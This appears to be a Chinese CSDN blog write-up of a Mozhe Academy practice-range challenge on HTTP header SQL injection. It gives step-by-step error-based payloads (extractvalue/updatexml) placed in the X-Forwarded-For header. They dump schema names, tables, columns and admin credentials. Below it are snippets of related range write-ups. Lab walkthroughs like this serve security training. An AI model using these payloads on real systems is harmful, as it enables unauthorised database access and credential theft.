墨者学院之靶场(http请求头注入)

已于 2023-10-07 22:28:13 修改
阅读量135 收藏
点赞数
分类专栏: win10 文章标签: http 网络协议 网络 web安全 计算机网络 安全威胁分析 网络安全
于 2023-10-07 22:27:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44652484/article/details/133658783
版权 
(1)开启靶机、开启BP
(2)尝试使用admin进行账密登录
(3)抓取请求报文,请求头中加入X-Forwarded-For:1,返回登录失败!请不要非法尝试登录,本次登录IP::1已记录!
(4)尝试闭合:X-Forwarded-For:1',2)#   2这个地方我们用报错注入的方式写SQL语句并传到数据库中而且不被过滤掉
(5)爆用户名:admin@local host
(extractvalue(1,concat(0x7e,(select user()))))
(6)爆库名:'~information_schema,webcalendar'
(extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata))))
(7)爆表名:'~logins,user~'
and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='webcalendar'),'~'),1)and '
(8)爆字段名:'~id,username,password~'
and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='webcalendar' and table_name=’user’),'~'),1)and '
(9)爆数据:'~1-admin-238398166~'
and updatexml(1,concat('~',(select group_concat(id,'-',username,'-',password) from user),'~'),1)and '
(10)登录获取到key:
(11)KEY: mozhed6309d6ad867f8d2f620a8dc00e

开启靶场:

www.mozhe.cn

DMXA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
墨者学院 在线靶场 HTTP动作练习
weixin_60937978的博客
04-21 267
抓包 把GET改成POST,把中间的content剪切到末尾,去掉问号 bug zh 正确答案
墨者HTTP注入实战(host注入
m0_60945802的博客
03-18 7271
墨者HTTP注入实战(host注入) 本小白在学习这个靶场的时候,遇到了一些困惑,查找了一些资料,希望能到帮到大家。
墨者学院-在线靶场 - CMS系统漏洞分析溯源(第7题)
a519395243的博客
12-25 1454
墨者 在线靶场 CMS系统漏洞分析溯源(第7题) DEDECMS 任意用户密码重置漏洞利用   开始用 admin 发现前台出错,后台也登录不了,改用 test 帐号 利用burp 抓包改 Post http://219.153.49.228:47764/member/resetpassword.php POST /member/resetpassword.php HTTP/1.1 dopo...
墨者学院-HTTP注入漏洞测试(X-Forwarded-for)
JimWu的博客
09-04 504
HTTP注入漏洞测试(X-Forwarded-for) 难易程度:★★ 题目类型:WEB安全 使用工具:FireFox浏览器、burpsuite 1.打开靶场,根据题目是http注入,打开burpsuite,点击链接,截取包。 2.send to repeater,在下方加一行X-Forwarded-For,开始注入。 3.输入1=1,go一下,返回正常页面。 4.输入union selec...
墨者靶场—SQL手工注入漏洞测试(MySQL数据库)
weixin_46694260的博客
03-23 7244
0x00 前言 学SQL注入也有一段时间了,找了一个在线靶场,这个题目基本上学会最基本的注入原理和方法都能拿下,废话就不多说了,直接来演示吧~菜鸟渗透,大佬勿喷 0x01 过程 首先我们先稍微看一下题目 通过题目我们可以看出靶场环境是Nginx+PHP+MySQL 那我们现在启动、进入靶场 ...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 v3.7.2.9
03-12
墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品! 墨者安全专家第二代是融合了反rootkit技术、用户权限管理技术和白名单技术并有机集成的免疫"革离"技术。同时第二代集...
墨者安全专家
07-04
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者靶场 uWSGI 漏洞复现(CVE-2018-7490)
曹振国的博客
06-08 1001
uWSGI 漏洞复现查看靶场提示漏洞简介受影响版本漏洞分析漏洞复现 查看靶场提示 漏洞简介 CVE-2018-7490 (PHP目录遍历漏洞) uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范 受影响版本 uWSGI 2.0.17之前的版本 漏洞分析
墨者靶场】---3、Ruby On Rails漏洞复现第一题(CVE-2018-3760)
qq_43168364的博客
08-21 322
背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 实训目标 1、学会根据漏洞编号查找漏洞详情; 2、了解Ruby On Rails(CVE-2018-3760)形成原理; 3、学习Ruby On Rails(CVE-2018-3760)利用方法; 解题方向 利用已知漏洞读取文件passwd 漏洞说明 Ruby On Rails在开发环境下使用Sprocket
墨者靶场(三)sql字符注入
weixin_45670595的博客
09-24 101
手工注入时,一直报错,评论中说在–后加+ 上网查到了原因: https://blog.csdn.net/weixin_43096078/article/details/108215076 记录一下
墨者靶场SQL手工注入漏洞测试(Sql Server数据库)
曹振国的博客
06-20 436
Mssql关于SqlServer进入环境:1.寻找注入点:2.查询字段数:3.查询输出点:4.查询库名:5.查询表:6.查询字段:7.查询数据:MD5解码,进入后台拿到key值: 关于SqlServer MSSQL显错注入和MYSQL不太一样: 联合查询,记住要写UNION ALL 然后猜输出点要使用NULL去填充 注释只有-- + 进入环境: 1.寻找注入点: ?id=1 //报错 ?id=2 //正常 2.查询字段数: 有4个字段 ?id=2 and 1=1 order by 4 //正常
03#墨者靶场-SQL手工注入漏洞测试(MySQL数据库)
shy的博客
11-15 720
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 1.登陆墨...
墨者学院在线靶场writeup
john_david_的博客
02-14 5030
入门 WEB页面源代码查看 打开是一个HTML页面,鼠标右键被禁用,直接F12,控制台点Elements看源代码,就发现key了 WEB页面分析 打开靶场F12,看到注释,按照注释方法构造url,index.php?url=login.php,跳转拿到key 服务器返回数据查看 F12打开控制台,点击network,点击ip,点heards,然后展开response就可以看到key 浏览器信息伪造...
07#墨者靶场-phpMyAdmin后台文件包含分析溯源
shy的博客
11-22 1400
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 1.在墨者学院找到...
墨者学院-入门级-HTTP动作练习-小白必看(超详细)
kitiu666的博客
08-18 1458
2020年8月18日,第四次渗透测试试验。 通过拦截数据包响应包,修改内容,实现get变为post的提交。 准备需要: 1.window电脑 2.burpsuite(bp)抓包软件 1.进入靶场 点击【静夜思】后发现页面会发生错误 这时它提示我们说相应URL过长 这样就涉及到GET和POST提交方式的区别 我们猜想有可能是URL的长度过长导致报错 2.开启bp代理 开启响应包拦截(不懂的可以看我第一次试验的投稿) 然后发现,拦截到的数据包有巨多内容,而且提交方式为GET 3.根据提示和之前的两者区
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3237
此题很简单,可以完全参照 https://blog.csdn.net/qq_42357070/article/details/81215715 进行解题 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
墨者学院sqlmap Host注入
07-28
墨者学院SQLMap是一款常用的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。而Host注入是一种特定类型的SQL注入攻击方法,攻击者通过修改HTTP请求中的Host字段来执行恶意的SQL查询。 使用SQLMap进行Host注入的步骤如下: 1. 首先,确认目标网站存在Host注入漏洞。可以通过手动尝试修改Host字段并观察响应来确认漏洞存在与否。 2. 下载并安装SQLMap工具。可以从墨者学院的官方网站或GitHub仓库获取最新版本。 3. 执行命令`sqlmap -u "目标URL" --headers="Host: 注入点"`,其中目标URL是要测试的目标网站URL,注入点是漏洞存在的Host字段位置。 4. SQLMap将自动进行漏洞检测和注入测试,并生成相关报告和结果。 请注意,Host注入是一种非常危险的攻击方法,仅限用于合法的安全测试目的。在未经授权的情况下使用该方法进行攻击是违法的,并可能导致法律后果。在进行任何安全测试之前,请确保获得合法授权并遵守适用的法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值